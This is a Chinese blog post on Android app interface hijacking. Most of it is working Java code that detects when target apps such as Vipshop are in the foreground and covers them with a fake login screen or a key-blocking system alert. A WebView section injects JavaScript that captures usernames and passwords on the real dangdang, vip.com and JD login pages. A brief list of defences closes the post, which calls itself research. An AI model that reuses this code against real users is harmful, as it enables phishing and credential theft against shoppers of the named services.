简单移动Android客户端,【移动安全】App客户端劫持及简单防护

最新推荐文章于 2023-01-08 19:15:00 发布
最新推荐文章于 2023-01-08 19:15:00 发布
阅读量673 收藏
点赞数
文章标签: 简单移动Android客户端

阅读:

4,028

Android APP客户端安全评估中,有一项叫做activity界面劫持。该bug的攻击场景是,当手机中的恶意APP检测到当前运行的为目标APP时,就启动自身的钓鱼界面覆盖到目标APP之上,以欺骗用户输入账号密码等。本文将要归纳Android各个版本可以使用的检测当前运行的APP的方法,及附带webview的劫持示例。

1、getRunningTasks(android5.0之前)

ActivityManager am = (ActivityManager) getBaseContext().getSystemService (Context.ACTIVITY_SERVICE);

ComponentName cn = am.getRunningTasks(1).get(0).topActivity;

String packageName = cn.getPackageName();

List list = Arrays.asList(TARGET_APPS);

if(packageName != null && list.contains(packageName)){

Intent i = new Intent();

i.setClassName("com.haoren.hijack", "com.haoren.hijack.Login");

i.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);

getApplicationContext().startActivity(i);

break;

}

getRunningTasks需要使用权限android:name=”android.permission.GET_TASKS”

除了使用activity覆盖目标APP,还可以使用alertwindow(模态弹窗),如下demo

view = LayoutInflater.from(getApplicationContext()).inflate(R.layout.login, null);

wm = (WindowManager) getSystemService(Context.WINDOW_SERVICE);

final WindowManager.LayoutParams params = new WindowManager.LayoutParams();

params.type = WindowManager.LayoutParams.TYPE_SYSTEM_ALERT;

int flags1 = WindowManager.LayoutParams.FLAG_ALT_FOCUSABLE_IM;

params.flags = flags1;

params.width = LayoutParams.MATCH_PARENT;

params.height = LayoutParams.MATCH_PARENT;

params.gravity = Gravity.CENTER;

wm.addView(view, params);

//设置不响应任何按键,可拒绝服务

view.setOnKeyListener(new OnKeyListener() {

@Override

public boolean onKey(View v, int keyCode, KeyEvent event) {

switch (keyCode) {

case KeyEvent.KEYCODE_BACK:

if(wm != null)

wm.removeView(view);

return true;

default:

return false;

}

}

});

alertwindow需要使用权限android:name=”android.permission.SYSTEM_ALERT_WINDOW”

2、Accessibility Service(辅助功能,一直可用)

在Accessibility Service的onAccessibilityEvent回调函数中,可以检测到当前执行的APP,如下

@Override

public void onAccessibilityEvent(AccessibilityEvent arg0) {

String topActivity = null;

String s = "";

if(arg0 != null){

if(arg0.getPackageName() != null){

topActivity = arg0.getPackageName().toString();

}

if(arg0.getText() != null){

s = arg0.getText().toString().split(",")[0].replace("[", "").replace("]", "");

}

}

//if(topActivity.equals("com.achievo.vipshop") && s.equals("登 录")){

if(topActivity.equals("com.achievo.vipshop")){

Log.i("accessibility", "xxxx"+s);

Intent i = new Intent();

i.setClassName("com.haoren.hijack", "com.haoren.hijack.Login");

i.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);

getApplicationContext().startActivity(i);

}

}

3、通过/proc/目录也可以获取当前应用(Android7.0中限制了APP获取/proc/的内容,会失效)

使用github中的AndroidProcesses库,可以直接获取,如下

PackageManager pm = getApplicationContext().getPackageManager();

AndroidAppProcess target = null;

List list = Arrays.asList(TARGET_APPS);

String pName = null;

while(true){

target = null;

List processes = AndroidProcesses.getRunningAppProcesses();

for(AndroidAppProcess a : processes){

PackageInfo packageInfo;

try {

Stat stat = a.stat();

int pid = stat.getPid();

packageInfo = a.getPackageInfo(getApplicationContext(), 0);

String appName = packageInfo.applicationInfo.loadLabel(pm).toString();

pName = packageInfo.packageName;

if(appName != null && list.contains(pName) && new AndroidAppProcess(pid).foreground){

target = a;

Log.i("xu", "xuxu"+pid);

break;

}

} catch (Exception e) {

e.printStackTrace();

}

}

if(target != null){

Log.i("xu", "xuxu"+pName);

//do something here

break;

}

}

4、UsageStatsManager(Android5.0引入)

需要系统级别权限android.permission.PACKAGE_USAGE_STATS(系统签名的APP能使用该权限),参见

github中的android-overlay-malware-example

5、webview

webview加载目标m站后,再加载恶意js,劫持用户输入,如下

webview添加java接口:

webView.addJavascriptInterface(new MyJavaScriptInterface(), “MYOBJECT”);

然后覆盖setWebViewClient的onPageFinished,插入js代码,劫持用户输入

@Override

public void onPageFinished(WebView view, String url) {

super.onPageFinished(view, url);

StringBuilder sb = new StringBuilder();

if(url.contains("vip.com")){

sb.append("document.getElementByIdx_x_x_x_x('J_topDownloadBar').style.display='none';");

}

if(url.contains("mpassport.dangdang.com")){

sb.append("document.getElementByIdx_x_x_x_x('password').οnblur=function(){");

sb.append("var objPWD, objAccount;var str = 'dangdang';");

sb.append("objAccount = document.getElementByIdx_x_x_x_x('username');");

sb.append("objPWD = document.getElementByIdx_x_x_x_x('password');");

sb.append("if (objAccount != null) {str += objAccount.value;}");

sb.append("if (objPWD != null) { str += ' , ' + objPWD.value;}");

sb.append("window.MYOBJECT.processHTML(str);");

sb.append("return true;");

sb.append("};");

}else if(url.contains("mlogin.vip.com")){

sb.append("document.getElementByIdx_x_x_x_x('inputPsw').οnblur=function(){");

sb.append("var objPWD, objAccount;var str = 'vip';");

sb.append("objAccount = document.getElementByIdx_x_x_x_x('inputName');");

sb.append("objPWD = document.getElementByIdx_x_x_x_x('inputPsw');");

sb.append("if (objAccount != null) {str += objAccount.value;}");

sb.append("if (objPWD != null) { str += ' , ' + objPWD.value;}");

sb.append("window.MYOBJECT.processHTML(str);");

sb.append("return true;");

sb.append("};");

}else if(url.contains("plogin.m.jd.com")){

sb.append("document.getElementsByClassName('txt-input txt-password')[0].οnblur=function(){");

sb.append("var objPWD, objAccount;var str = 'jd';");

sb.append("objAccount = document.getElementsByClassName('txt-input txt-username')[0];");

sb.append("objPWD = document.getElementsByClassName('txt-input txt-password')[0];");

sb.append("if (objAccount != null) {str += objAccount.value;}");

sb.append("if (objPWD != null) { str += ' , ' + objPWD.value;}");

sb.append("window.MYOBJECT.processHTML(str);");

sb.append("return true;");

sb.append("};");

}else{

sb.append("document.getElementsByTagName_r('form')[0].onsubmit = function () {");

sb.append("var objPWD, objAccount;var str = 'other';");

sb.append("var inputs = document.getElementsByTagName_r('input');");

sb.append("for (var i = 0; i < inputs.length; i++) {");

sb.append("if (inputs[i].type.toLowerCase() === 'password') {objPWD = inputs[i];}");

sb.append("else if (inputs[i].name.toLowerCase() === 'email') {objAccount = inputs[i];}");

sb.append("}");

sb.append("if (objAccount != null) {str += objAccount.value;}");

sb.append("if (objPWD != null) { str += ' , ' + objPWD.value;}");

sb.append("window.MYOBJECT.processHTML(str);");

sb.append("return true;");

sb.append("};");

}

view.loadUrl("javascript:" + sb.toString());

}

以上是个人归纳的客户端劫持可能的途径(此类攻击难度较大,分享出来作技术研究)

防护方法

最后,一个粗略的防护方案:

①、对于界面(activity)覆盖,可以利用同样的方法,判断是否为自身在activity栈顶。

②、alertwindow不是activity栈机制,依然无法检测。在android6.0之后,如果app是从Play  Store安装的,则SYSTEM_ALERT_WINDOW自动允许,如果是其他途径安装的则需要用户手动在设置中开启 悬浮窗 权限。

另外重载onFilterTouchEventForSecurity函数可以进行安全检测(未测)

③、对Accessibility Service这类,只有提高用户的安全意识方面着手

④、对于webview类型的劫持,可以利用js计算当前页面是否被篡改过

⑤、对于/proc/目录和UsageStatsManager两个 Android系统方面也有相应的防护

邝烁
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Android安全——客户端安全要点,h5开发移动
m0_66145060的博客
01-11 645
作为一个开发人员,必须具备安全意识,掌握基础的安全知识,为打造更加安全的应用做出努力。本文浅谈Android客户端安全问题,涉及组件、WebView、存储、传输、日志、混淆、应用加固等安全漏洞及防护策略,运用更加合理的配置与防护措施来提高应用的安全级别。 二、组件安全: 规范安卓标准组件(Activity、Service、Receiver、Provider)的访问权限。 这里提到的组件访问权限主要是指跨应用的进程间通信(IPC,Inter-Process Communication),开发者可以限定应用
Android界面防劫持,Activity防劫持,无视Android系统版本限制,无需操作栈
01-20
Android Activity 防劫持,界面防劫持,无视Android系统版本限制,无需操作栈
Android安全——客户端安全要点
黄孝果的博客
05-24 4887
一、前言: 近期facebook的隐私泄露事件再度唤起了公众对隐私的关注,在这个越来越重视个人隐私的时代里,安全早已是一个无法绕开的话题。 作为一个开发人员,必须具备安全意识,掌握基础的安全知识,为打造更加安全的应用做出努力。本文浅谈Android客户端安全问题,涉及组件、WebView、存储、传输、日志、混淆、应用加固等安全漏洞及防护策略,运用更加合理的配置与防护措施来提高应用的安全级别。...
android程序劫持劫持,Android 防止APP界面劫持
weixin_35940165的博客
05-26 711
package 包名.publics.tools;import android.app.Activity;import java.util.ArrayList;import java.util.List;import java.util.Timer;import java.util.TimerTask;/*** Title: AtyModule* Description: 界面劫持监测方法*/pu...
简单的实现app界面劫持和后台监控
weixin_50987385的博客
03-15 2243
如今越来越多的手机玩家都为了折腾一些稀奇古怪的东西,或出于好奇,或出于贪心,往往会root手机去尝试安装一些外挂,刷分,刷粉,修改版等等乱七八糟的东西 正因为此类用户的存在,一些小人就盯上了这方面的市场,去开发一些盗取财产,密码,锁机等等 今天我就给大家看一个简单劫持 当打开QQ登录界面时,提示界面被劫持了 这是如何实现呢,其实很简单,当我们安装了不正常的appapp后台会开启一个后台服务,用于循环检测当前顶层页面是否是我们需要劫持的,如果不是,继续检测 new Thread(new Runnable
移动金融客户端应用软件安全管理规范》(JRT 0092-2019).pdf
02-18
移动金融客户端应用软件安全管理规范》(JRT 0092-2019)
天弘基金移动App客户端架构优化之路
02-25
天弘基金作为一家在基金,金融行业高速发展的公司,APP面临着多重挑战,如庞大的用户群体、高频的基金业务、交易安全可靠性等等。天弘基金移动端的开发小伙伴在技术和业务的多重压力下,不断推进着天弘·爱理财...
Android移动客户端-布正集团App
01-11
Android移动客户端-布正集团App
WorkPlus Lite Android客户端开源的企业级移动平台
最新发布
07-04
WorkPlus Lite Android客户端开源的企业级移动平台。WorkPlus Lite Android版本使用的语言为java以及kotlin。前期以java为主,在kotlin变为Andoid第一开发语言后,项目将kotlin做为主要开发语言。
江苏移动网上营业厅app下载 江苏移动网上营业厅客户端 v6.0.2
10-15
【江苏移动网上营业厅app】是一款专为江苏地区的中国移动用户设计的手机应用,它由官方出品,确保了信息的安全性和准确性。此应用的版本号为v6.0.2,适用于Android 2.2及以上的操作系统,为用户提供了一系列便捷的...
APP劫持检测
07-06
HijackActivity.apk能用于检测APP是否可被劫持。再凑点字数
Activity_Hijack.apk
04-19
用途:该工具主要用于APP劫持检测。 使用方法:安装HijackActivity.apk,使用 activity 界面劫持工具,在工具中指定要劫持的应用进程名称。如图所示,从列表中选择被测试的应用,点击 OK。打开应用,测试工具会尝试用自己的窗口覆盖被测的应用,如果劫持成功,会出现如下界面。 威胁等级:若客户端无法抵抗 Activity 界面劫持攻击时为中风险;若可以抵抗攻击则无风险。 安全建议:Activity劫持通常依靠注册Receiver响应android.intent.action.BOOT_COMPLETED事件。客户端程序可以在启动前检查Receiver并报警;由于Activity界面劫持攻击通常是将自己的页面附着在客户端之上,因此需要进行界面切换操作,因此在界面切换到后台时弹出警告信息也可以达到一定的效果。除此之外,因为Android进程栈的工作原理,建议开发客户端时针对进程栈进行相应的保护,可禁止其他进程放置于客户端之上。
Android安全——客户端安全要点,已拿offer附真题解析
m0_63935374的博客
11-11 1570
localBroadcastManager.registerReceiver(myReceiver, filter); 发送本地广播 Bundle bundle = new Bundle(); bundle.putParcelable(“DATA”, content); Intent intent = new Intent(); intent.setAction(“MY_ACTION”); intent.putExtras(bundle); LocalBroadcastManager.getInstan
app界面劫持总结
qq_2790289459的博客
05-15 991
界面劫持的出现操作 1.注册一个receiver,响应android.intent.action.BOOT_COMPLETED,开机启动 2.receiver中启动一个Service 3.在这个service中启动一个计时器,不停枚举当前进程中是否有预设的进程启动,如果发现有预设进程,则使用FLAG_ACTIVITY_NEW_TASK启动自己的钓鱼界面,而正常应用的界面则隐藏在钓鱼界面的后面。 解决办法 这是系统漏洞,在应用程序中很难去防止这种界面支持。但应用程序自身可以增加一些防范实施。 防范实施
Android App安全防范措施的小结
A_991128a的博客
01-08 216
这些措施也只是冰山一角,因为安全一直是永恒的话题。我们还可以考虑使用加壳、反动态调试等等。参考资料:Java与Android技术栈:每周更新推送原创技术文章,欢迎扫描下方的公众号二维码并关注,期待与您的共同成长和进步。
android 资源被窜改,Android 防止App升级过程被劫持和换包
weixin_36158990的博客
05-26 348
很多情况App在下载安装,同时app再升级过程中,遭到劫持。根据用户反映更新后是一个未知的App。针对此类情况,特做了app劫持安装防护,稍作分析只要在本地对apk文件进行包名、应用名和签名校验,如果包名和签名不一致,那么就是伪装程序,这个漏洞显而易见!废话不多说直接上代码。public class ReadApkMessageUtils {private static String appNa...
Android页面劫持问题整理
JavaKotlin技术专栏
05-26 1694
什么是Activity劫持 APP正常的Activity界面被恶意攻击者替换上仿冒的恶意Activity界面进行攻击和非法用途。界面劫持攻击通常难被识别出来,其造成的后果不仅会给用户带来严重损失,更是移动应用开发者们的恶梦。举个例子来说,当用户打开安卓手机上的某一应用,进入到登陆页面,这时,恶意软件侦测到用户的这一动作,立即弹出一个与该应用界面相同的Activity,覆盖掉了合法的Activity,用户几乎无法察觉,该用户接下来输入用户名和密码的操作其实是在恶意软件的Activity上进行的,最终会发生什.
Android逆向之玩转Xposed模块以劫持登录为例(Demo篇)
专注于移动互联网
05-08 1789
为帮助童鞋们更有节奏感地学习,本文分为Demo篇和实战篇来作叙述。 Xposed是一个很强大的android平台上的hook工具,其可以在不修改APK文件的情况下影响程序运行的框架服务,且在功能不冲突的情况下同时运作。
HTML5页面被运营商进行DNS劫持问题及解决方案,app中h5页面源码的获取
ZHIYUANfL的博客
09-18 3278
App应用的html5页面经过运营商的移动网络(非wifi网络),被强制插入广告和手机管家的多余信息,在有些场景严重干扰用户的操作,也产生在美丽的页面上加入了不协调的悬浮层。并且这个手机管家类的悬浮层有时间出现,有时间不出现,神出鬼没,虽然你可以通过点击关闭手机手机关键是突然出现,有时候还关闭不了。总之用户不喜欢这种用户不需要的选择,所以干掉它吧!  在app中h5页面源码,可以通过下面代码获得
基于Android移动APP英语错题袋的设计与开发——以《上海版牛津英语6(A)》教材为例.pdf
06-21
基于Android移动APP英语错题袋的设计与开发 本文旨在设计和开发基于Android平台的移动APP英语错题袋,以《上海版牛津英语6(A)》教材为例。该移动APP英语错题袋旨在为中小学英语错题管理提供一个信息化英语教学...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值